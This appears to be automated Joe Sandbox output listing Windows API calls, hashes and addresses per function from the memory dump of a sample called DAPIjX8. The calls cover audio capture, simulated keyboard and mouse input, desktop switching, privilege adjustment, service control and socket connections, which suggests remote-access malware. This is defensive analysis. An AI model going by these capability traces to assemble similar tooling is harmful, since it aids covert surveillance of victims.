                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: 5db8f90c598cdc9769e58086308f86aa8b3de8cd9e53e462ad51321bb129b7cc
                                  • Instruction ID: 0f50569ad8056509e67ca09eec5ae2b9b2ce18c76f9c1319e15164d0528afc3e
                                  • Opcode Fuzzy Hash: 5db8f90c598cdc9769e58086308f86aa8b3de8cd9e53e462ad51321bb129b7cc
                                  • Instruction Fuzzy Hash: 7341DD75A012949FEB12CF54C8A1B9AB7F4FF44325F11816EE809AF281DB71BD41CB81
                                  APIs
                                    • Part of subcall function 1002D4A0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 1002D4DD
                                    • Part of subcall function 1002D4A0: GetLastError.KERNEL32 ref: 1002D4E3
                                    • Part of subcall function 1002D4A0: wsprintfA.USER32 ref: 1002D560
                                    • Part of subcall function 1002D4A0: GetFileAttributesA.KERNEL32(?), ref: 1002D5F7
                                  • ScreenToClient.USER32(00000000,?), ref: 1002E4D1
                                  • ChildWindowFromPoint.USER32(00000000,?,?), ref: 1002E4E0
                                  • ScreenToClient.USER32(00000000,?), ref: 1002E4FC
                                  • ChildWindowFromPoint.USER32(00000000,?,?), ref: 1002E50B
                                  • GetWindowPlacement.USER32(00000000,?,?,?,?,?,?,?,?), ref: 1002E54A
                                  • RealGetWindowClass.USER32(00000000,?,00000104), ref: 1002E5B9
                                  • lstrcmp.KERNEL32(?,10079494), ref: 1002E5CC
                                  • SendMessageA.USER32(00000000,000001E1,00000000,00000000), ref: 1002E5E2
                                  • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 1002E5F6
                                  • GetMenuItemID.USER32(00000000,00000000), ref: 1002E600
                                  • PostMessageA.USER32(00000000,?,?,?), ref: 1002E786
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Window$FromPoint$ChildClientItemMenuMessageScreen$AttributesClassErrorFileFolderLastPathPlacementPostRealSendlstrcmpwsprintf
                                  • String ID:
                                  • API String ID: 3814162062-0
                                  • Opcode ID: 2941e1f21a4b631bef5a80c12ca6aeac005e4635fb958a5590a2804724c5751c
                                  • Instruction ID: 267d7cb945fb86d99aaf7d0182b736ab93efce9508fa975a84536e16a4d7527c
                                  • Opcode Fuzzy Hash: 2941e1f21a4b631bef5a80c12ca6aeac005e4635fb958a5590a2804724c5751c
                                  • Instruction Fuzzy Hash: 2B01AD32048662AFD312DF10D845A6FBBEAEBC8351F52480DF99642121DF34DC09DBA2
                                  APIs
                                    • Part of subcall function 1002D720: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 1002D75B
                                    • Part of subcall function 1002D720: lstrcpy.KERNEL32(?,?), ref: 1002D799
                                    • Part of subcall function 1002D720: CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 1002D7C3
                                    • Part of subcall function 1002D720: GetFileSize.KERNEL32(00000000,00000000), ref: 1002D7D7
                                    • Part of subcall function 1002D720: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1002D7F9
                                    • Part of subcall function 1002D720: _strstr.LIBCMT ref: 1002D809
                                    • Part of subcall function 1002D720: _strstr.LIBCMT ref: 1002D828
                                    • Part of subcall function 1002D720: _strstr.LIBCMT ref: 1002D840
                                  • ScreenToClient.USER32(00000000,?), ref: 1002E4D1
                                  • ChildWindowFromPoint.USER32(00000000,?,?), ref: 1002E4E0
                                  • ScreenToClient.USER32(00000000,?), ref: 1002E4FC
                                  • ChildWindowFromPoint.USER32(00000000,?,?), ref: 1002E50B
                                  • GetWindowPlacement.USER32(00000000,?,?,?,?,?,?,?,?), ref: 1002E54A
                                  • RealGetWindowClass.USER32(00000000,?,00000104), ref: 1002E5B9
                                  • lstrcmp.KERNEL32(?,10079494), ref: 1002E5CC
                                  • SendMessageA.USER32(00000000,000001E1,00000000,00000000), ref: 1002E5E2
                                  • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 1002E5F6
                                  • GetMenuItemID.USER32(00000000,00000000), ref: 1002E600
                                  • PostMessageA.USER32(00000000,?,?,?), ref: 1002E786
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Window$FileFromPoint_strstr$ChildClientItemMenuMessageScreen$ClassCreateFolderPathPlacementPostReadRealSendSizelstrcmplstrcpy
                                  • String ID:
                                  • API String ID: 2189505526-0
                                  • Opcode ID: 71dc371eb44f6791cff85a29ba50106697bc11bbc7c20150ca67a3d63eec9abc
                                  • Instruction ID: 37a7343a7be6c126ce2e24860b5f9666bdd6cd10573639b1608690e8b3f5eac9
                                  • Opcode Fuzzy Hash: 71dc371eb44f6791cff85a29ba50106697bc11bbc7c20150ca67a3d63eec9abc
                                  • Instruction Fuzzy Hash: 1A01C036008262AFD312CF10D845A7FBBE6EBC8351F42480DF99642120EF34CC09DBA2
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 100223DE
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 100223EF
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 10022413
                                  • closesocket.WS2_32(000000FF), ref: 10022426
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 10022438
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$closesocket
                                  • String ID:
                                  • API String ID: 3380830492-0
                                  • Opcode ID: 35ced25d468d5670fca1f9a04b1e1b485d0dd7ddd7f6f3567e06f47098f018b7
                                  • Instruction ID: 5ff07feb1a9c44cadb94ebe3703caac7099068f00097b4d04046e54c2d718554
                                  • Opcode Fuzzy Hash: 35ced25d468d5670fca1f9a04b1e1b485d0dd7ddd7f6f3567e06f47098f018b7
                                  • Instruction Fuzzy Hash: 7801B131500914BBC301DFA8CC889DDBBEAEF16371F524355FD65A36D0DB70AA958AD0
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 100223DE
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 100223EF
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 10022413
                                  • closesocket.WS2_32(000000FF), ref: 10022426
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 10022438
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$closesocket
                                  • String ID:
                                  • API String ID: 3380830492-0
                                  • Opcode ID: ea77a2f87bbcd6cc39a3a749d8b4df51597107300b4aada49ffeb47442c28fdf
                                  • Instruction ID: cdd6664473d1b38a8f5df16eddca6dd789a76da583ef31535192caff020e5974
                                  • Opcode Fuzzy Hash: ea77a2f87bbcd6cc39a3a749d8b4df51597107300b4aada49ffeb47442c28fdf
                                  • Instruction Fuzzy Hash: B101B130500914BBC301DFA8C8889D9BBEAEF16361F524355F955932D0DB70AA958AD0
                                  APIs
                                  • _free.LIBCMT ref: 1005A7F3
                                    • Part of subcall function 1004D9B2: HeapFree.KERNEL32(00000000,00000000,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7), ref: 1004D9C8
                                    • Part of subcall function 1004D9B2: GetLastError.KERNEL32(10053BE7,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7,10053BE7), ref: 1004D9DA
                                  • _free.LIBCMT ref: 1005A805
                                  • _free.LIBCMT ref: 1005A817
                                  • _free.LIBCMT ref: 1005A829
                                  • _free.LIBCMT ref: 1005A83B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5cde48d4c67deb276c8c0114ed93fbd9285caafbdb6db17bde0aeeed6ae2ce87
                                  • Instruction ID: 03de9a4bc28bb952db687bd92be6ab742a76b13ec67cfc6ba790fde6ff0c5c29
                                  • Opcode Fuzzy Hash: 5cde48d4c67deb276c8c0114ed93fbd9285caafbdb6db17bde0aeeed6ae2ce87
                                  • Instruction Fuzzy Hash: 9BF04931905210ABCB65EB58E8CAC6A33EDFE057A03618827F409D7601CA20FCC08A64
                                  APIs
                                  • waveInGetNumDevs.WINMM(10081068), ref: 10025425
                                  • waveInGetDevCapsA.WINMM(00000000,?,00000030), ref: 10025497
                                  • WaitForSingleObject.KERNEL32(?,000000FF,10081068), ref: 100255AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wave$CapsDevsObjectSingleWait
                                  • String ID: N/A@
                                  • API String ID: 3710653462-4129345051
                                  • Opcode ID: 1243b2e7a641a833e1cbaf8e48201dfae163a94c9e19b0b69b5f6b5cad6363ee
                                  • Instruction ID: 13a6ff94af0e77f7e1e2c1b732d13b475a11508fa2af27eba5e8f420a26f26ce
                                  • Opcode Fuzzy Hash: 1243b2e7a641a833e1cbaf8e48201dfae163a94c9e19b0b69b5f6b5cad6363ee
                                  • Instruction Fuzzy Hash: 17518BB1904B6A9FDF01CF20DC5079EBBF6EF44311F410295DA1A6B282DB31AE44CBA5
                                  APIs
                                  • LoadLibraryA.KERNEL32(10079594,10081068,?,Enable,?,?,?,?,?,00000000,1003AC40,1007CC88,000000FE,?,10032F11,10078A50), ref: 10031682
                                  • lstrlen.KERNEL32(10078A50,?,?,?,?,?,00000000,1003AC40,1007CC88,000000FE,?,10032F11,10078A50,00000001,Enable,00000000), ref: 10031756
                                  • FreeLibrary.KERNEL32(1007CC88,?,?,?,?,?,00000000,1003AC40,1007CC88,000000FE,?,10032F11,10078A50,00000001,Enable), ref: 100317E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Library$FreeLoadlstrlen
                                  • String ID: Enable
                                  • API String ID: 4087948096-4094479620
                                  • Opcode ID: 0b002468361c8ddaca228f60010b33fa468b1118439e5910450c11e71b4e25f7
                                  • Instruction ID: 0d77bde4d3f6e19500842112d0ba871150051fa243446ffc32163de4919ff8aa
                                  • Opcode Fuzzy Hash: 0b002468361c8ddaca228f60010b33fa468b1118439e5910450c11e71b4e25f7
                                  • Instruction Fuzzy Hash: A2511971E04219AFEB11CFA5CC44FEEBBB9EF08751F144026FA15FA160DB7599108BA4
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,1006421C), ref: 1002F265
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1002F2A6
                                  • wsprintfA.USER32 ref: 1002F325
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                  • String ID: :\
                                  • API String ID: 3001812590-112054617
                                  • Opcode ID: 59b8e9a0ba33c22135eafea2768a0eb134a479e50700c0f27db9a57b3749d08b
                                  • Instruction ID: 68377135c77cc68ebf0f72161ecdd038539ba62a48a7956cd91579c1b7ec4f44
                                  • Opcode Fuzzy Hash: 59b8e9a0ba33c22135eafea2768a0eb134a479e50700c0f27db9a57b3749d08b
                                  • Instruction Fuzzy Hash: DA21077090036C6EDB15CA758C82BEDBFFCDB15300F0080EAE544EA291D6749B898FA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: e09ab61a6ca2936a1f0842c2723999058e119adbfc44070de7caad6fd36ae0f5
                                  • Instruction ID: 64171ecbdf8fc30144a333dd3e82c8524222b5e941e06bec0c7444253493c20c
                                  • Opcode Fuzzy Hash: e09ab61a6ca2936a1f0842c2723999058e119adbfc44070de7caad6fd36ae0f5
                                  • Instruction Fuzzy Hash: 21B13971D086D69FDB11CF28C8817AEBBE5EF55390F3641BAE844DB242D6349D01CB68
                                  APIs
                                    • Part of subcall function 10030BD0: GetCurrentThreadId.KERNEL32 ref: 10030BE8
                                    • Part of subcall function 10030BD0: GetThreadDesktop.USER32(00000000), ref: 10030BEF
                                    • Part of subcall function 10030BD0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10030C3A
                                    • Part of subcall function 10030BD0: lstrcmpiA.KERNEL32(?,?), ref: 10030C7E
                                    • Part of subcall function 10030BD0: SetThreadDesktop.USER32(00000000), ref: 10030C89
                                  • SetCursorPos.USER32(00000000,?,?,10064418,?,?,?,10025C3D,?,?), ref: 10026504
                                  • WindowFromPoint.USER32(00000000,?,?,10064418,?,?,?,10025C3D,?,?), ref: 1002650E
                                  • SetCapture.USER32(00000000,?,10064418,?,?,?,10025C3D,?,?), ref: 10026515
                                  • keybd_event.USER32(00000000,00000000,?,10064418), ref: 10026557
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: DesktopThread$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpi
                                  • String ID:
                                  • API String ID: 1651361913-0
                                  • Opcode ID: 0c169ef81d4b393fcb1e124fbcb841d506da81848c973b49fe367cba5a86b9ea
                                  • Instruction ID: d031476395bb0bb1c03e5d69dddd94ee0d90c247bfd8109c8b9e3e810b713226
                                  • Opcode Fuzzy Hash: 0c169ef81d4b393fcb1e124fbcb841d506da81848c973b49fe367cba5a86b9ea
                                  • Instruction Fuzzy Hash: FC519E31780324BAF731CB649C8BF597766EB49F04F718226FB00BE1D1DAE1B8518A58
                                  APIs
                                  • _free.LIBCMT ref: 1005F45C
                                  • _free.LIBCMT ref: 1005F485
                                  • SetEndOfFile.KERNEL32(00000000,1005D64F,00000000,10052D46,?,?,?,?,?,?,?,1005D64F,10052D46,00000000), ref: 1005F4B7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,1005D64F,10052D46,00000000,?,?,?,?,00000000), ref: 1005F4D3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: b3d7b257df67468a99ab8e62c8491426388caf9ea3b71af238aa1f4c9f1779dc
                                  • Instruction ID: 9b928bc9920f47eaf83a4face1164b1f01003ff26f11db0b339bc9fe2be70295
                                  • Opcode Fuzzy Hash: b3d7b257df67468a99ab8e62c8491426388caf9ea3b71af238aa1f4c9f1779dc
                                  • Instruction Fuzzy Hash: 6141D77A9046055BDB11DFB4CC82AAF37B5EF443A0F310529F915E7192DB38ED498B21
                                  APIs
                                    • Part of subcall function 10049DE0: _free.LIBCMT ref: 10049DEE
                                    • Part of subcall function 100555E8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,7FFFFFFF,?,00000001,?,00000000,?,?,1004DD30,?,00000000,00000006), ref: 1005568A
                                  • GetLastError.KERNEL32 ref: 10055880
                                  • __dosmaperr.LIBCMT ref: 10055887
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100558C6
                                  • __dosmaperr.LIBCMT ref: 100558CD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                  • String ID:
                                  • API String ID: 167067550-0
                                  • Opcode ID: 3926a132f87e4109a2a1d4faa972ef2104e665fe2dc1ef1f2da86cad474e1fac
                                  • Instruction ID: 0a2aed4f8eacd2ddb5a1ff53a90e12f8f9725fd2544e7dd779b7d27ed8f125a9
                                  • Opcode Fuzzy Hash: 3926a132f87e4109a2a1d4faa972ef2104e665fe2dc1ef1f2da86cad474e1fac
                                  • Instruction Fuzzy Hash: 4621D375604216AFD710DFA5CCA2D6AB7EDEF002A57218525F819E7140DF32FD0487A0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fe9f3cc1fea7d5ee8450eafc1c042c66722bbb9f0f52a4a2f863344ab84818e
                                  • Instruction ID: fd1b72443f52a3ba2ca1641d2e14b8bcdfdf28fc6b16a1be3f15f840ce1b52f8
                                  • Opcode Fuzzy Hash: 2fe9f3cc1fea7d5ee8450eafc1c042c66722bbb9f0f52a4a2f863344ab84818e
                                  • Instruction Fuzzy Hash: 0421B775901626BBEB21DF248D84A4F3799DF416A0F220561FD05E7291EB70ED54C9E0
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 10018220
                                  • SendMessageW.USER32(?,0000000D,00000400,?), ref: 10018253
                                  • lstrlenW.KERNEL32(?), ref: 10018260
                                  • _wcsstr.LIBVCRUNTIME ref: 100182BA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: MessageSendVisibleWindow_wcsstrlstrlen
                                  • String ID:
                                  • API String ID: 2904981177-0
                                  • Opcode ID: 5cf3b5f1593f91350f351e5a00ba689d4ab39bd2bce597115d8c6efbbb6adb5d
                                  • Instruction ID: 3fef4562bcdc271cd2924335678147aadf90d790ac9991495059f90398aedb7c
                                  • Opcode Fuzzy Hash: 5cf3b5f1593f91350f351e5a00ba689d4ab39bd2bce597115d8c6efbbb6adb5d
                                  • Instruction Fuzzy Hash: 2F21017694011C6ADB51DBA4DD45BDAB3BCEF08601F0040A6F705EA141DE74AB498BA4
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,1003ED3E,?,?,?,?,1003EE09,?,?,10085840), ref: 1004E0E1
                                  • _free.LIBCMT ref: 1004E13E
                                  • _free.LIBCMT ref: 1004E174
                                  • SetLastError.KERNEL32(00000000,100811E4,000000FF,?,1003EE09,?,?,10085840), ref: 1004E17F
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 03cc86f2fd8e960c195e2d773208e9cb1a03103ca8321f1bffce4cc580359c88
                                  • Instruction ID: ad6ae8e3b24cd59acf3ac1b5e4344378db22414886cbd34bbc8e5c64ae17178a
                                  • Opcode Fuzzy Hash: 03cc86f2fd8e960c195e2d773208e9cb1a03103ca8321f1bffce4cc580359c88
                                  • Instruction Fuzzy Hash: 3F1125366482912BE712D7F54CCADAF219EEFC07B4B320236FA28C61F2DE719C058154
                                  APIs
                                  • GetLastError.KERNEL32(00000008,?,?,100497F6,10053BE7,?,1005DD1D,?,?,?,?), ref: 1004E238
                                  • _free.LIBCMT ref: 1004E295
                                  • _free.LIBCMT ref: 1004E2CB
                                  • SetLastError.KERNEL32(00000000,100811E4,000000FF,?,100497F6,10053BE7,?,1005DD1D,?,?,?,?), ref: 1004E2D6
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 82c33be00a4b6c0ee501a6f6e4c5d1aeddf7e16f812ae8c19ae35d72468006ac
                                  • Instruction ID: f56758dfd794b339ec9e550e5ad1ecdfa7a01281a14a424ce45bae03a1d6b24f
                                  • Opcode Fuzzy Hash: 82c33be00a4b6c0ee501a6f6e4c5d1aeddf7e16f812ae8c19ae35d72468006ac
                                  • Instruction Fuzzy Hash: 43110C366081516AE702D7F54ECADAF265EEFC13B1B320336FA18D61D2DDA1DD054154
                                  APIs
                                  • SetEvent.KERNEL32(?), ref: 100322AD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100322B8
                                  • waveInAddBuffer.WINMM(?,?,00000020), ref: 100322D2
                                  • DispatchMessageA.USER32(?), ref: 100322F0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: BufferDispatchEventMessageObjectSingleWaitwave
                                  • String ID:
                                  • API String ID: 204745351-0
                                  • Opcode ID: 91c3ab766f53dfa8765724531b7ecddfc0a843ddaf9fbd75d6e3375ec496e0bd
                                  • Instruction ID: 5ab2102c0d88b0b8f47d22a252cb3c75ca43ef1332af7c14eaf73d2de6573aea
                                  • Opcode Fuzzy Hash: 91c3ab766f53dfa8765724531b7ecddfc0a843ddaf9fbd75d6e3375ec496e0bd
                                  • Instruction Fuzzy Hash: A411D032A00319AFE710DFA9DC85F9AB7BAEB04721F010626E601DA1D0DB61E951CBA0
                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 1003320A
                                  • htons.WS2_32(?), ref: 10033229
                                  • connect.WS2_32(00000000,?,00000010), ref: 1003323A
                                  • closesocket.WS2_32(00000000), ref: 1003324A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: closesocketconnecthtonssocket
                                  • String ID:
                                  • API String ID: 3817148366-0
                                  • Opcode ID: e0e87266f4100410e46459b3aee8fac7b183189c69ef143c0b35ca8c9c184bb9
                                  • Instruction ID: 86eb78714c6bd48d37a1c5e0190e1159e497d6bb12789b97a2860bc2f6afef1d
                                  • Opcode Fuzzy Hash: e0e87266f4100410e46459b3aee8fac7b183189c69ef143c0b35ca8c9c184bb9
                                  • Instruction Fuzzy Hash: 1711E034A00218AFD701DFA88C45BEEF7B5EF49721F01421AFC42AB281DBB46A148BD0
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 1003D034
                                    • Part of subcall function 1003CF81: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 1003CFB0
                                    • Part of subcall function 1003CF81: ___AdjustPointer.LIBCMT ref: 1003CFCB
                                  • _UnwindNestedFrames.LIBCMT ref: 1003D049
                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 1003D05A
                                  • CallCatchBlock.LIBVCRUNTIME ref: 1003D082
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                  • String ID:
                                  • API String ID: 737400349-0
                                  • Opcode ID: 34d2527305fb361fe866b13f01d8eee121678cf240835e2e581a06a0c5e935de
                                  • Instruction ID: e306269b884234a2feb5dae1234a47549cba8091af87a0e9fb2468b86f827147
                                  • Opcode Fuzzy Hash: 34d2527305fb361fe866b13f01d8eee121678cf240835e2e581a06a0c5e935de
                                  • Instruction Fuzzy Hash: 07012936500148BFCF13AE96DC45EEB3B79EF89795F044115FE089A121D736E861DBA0
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001), ref: 1002109A
                                    • Part of subcall function 10030BD0: GetCurrentThreadId.KERNEL32 ref: 10030BE8
                                    • Part of subcall function 10030BD0: GetThreadDesktop.USER32(00000000), ref: 10030BEF
                                    • Part of subcall function 10030BD0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10030C3A
                                    • Part of subcall function 10030BD0: lstrcmpiA.KERNEL32(?,?), ref: 10030C7E
                                    • Part of subcall function 10030BD0: SetThreadDesktop.USER32(00000000), ref: 10030C89
                                    • Part of subcall function 10027530: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,?,?,00000124), ref: 100275B4
                                    • Part of subcall function 10027530: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000124), ref: 100275BB
                                    • Part of subcall function 10027530: LookupPrivilegeValueA.ADVAPI32 ref: 100275EA
                                    • Part of subcall function 10027530: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 10027604
                                    • Part of subcall function 10027530: GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 1002760A
                                    • Part of subcall function 10027530: CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 10027614
                                    • Part of subcall function 10027530: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002761E
                                  • LocalSize.KERNEL32(00000000), ref: 100210D6
                                  • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 100210EA
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100210F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: DesktopThread$CreateCurrentLocalOpenProcessToken$AdjustCloseErrorEventFreeHandleInputLastLookupObjectPrivilegePrivilegesSingleSizeSnapshotToolhelp32ValueWaitlstrcmpi
                                  • String ID:
                                  • API String ID: 1649480584-0
                                  • Opcode ID: b2fd186d60dea60b18e7665f1fbac649c551bd7b969c24e75bc93ba40ea87cd4
                                  • Instruction ID: c85d76b719439575972656a033a2b5b5b6a71999767bd8ce309b796f02c7f20d
                                  • Opcode Fuzzy Hash: b2fd186d60dea60b18e7665f1fbac649c551bd7b969c24e75bc93ba40ea87cd4
                                  • Instruction Fuzzy Hash: 02119D35D442688ADB20DF60EC56BDDB771EF55700F5001DAE44AA6292DFB51E84CF80
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001), ref: 100212EF
                                    • Part of subcall function 1002A4D0: OpenSCManagerA.ADVAPI32(00000000,00000000), ref: 1002A519
                                    • Part of subcall function 1002A4D0: OpenServiceA.ADVAPI32(?,?,000F01FF,1002A201,00000001), ref: 1002A5FD
                                    • Part of subcall function 1002A4D0: QueryServiceConfig2A.ADVAPI32(00000000,00000001,?,?,?), ref: 1002A628
                                  • LocalSize.KERNEL32(00000000), ref: 10021319
                                  • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1002132D
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000030), ref: 10021338
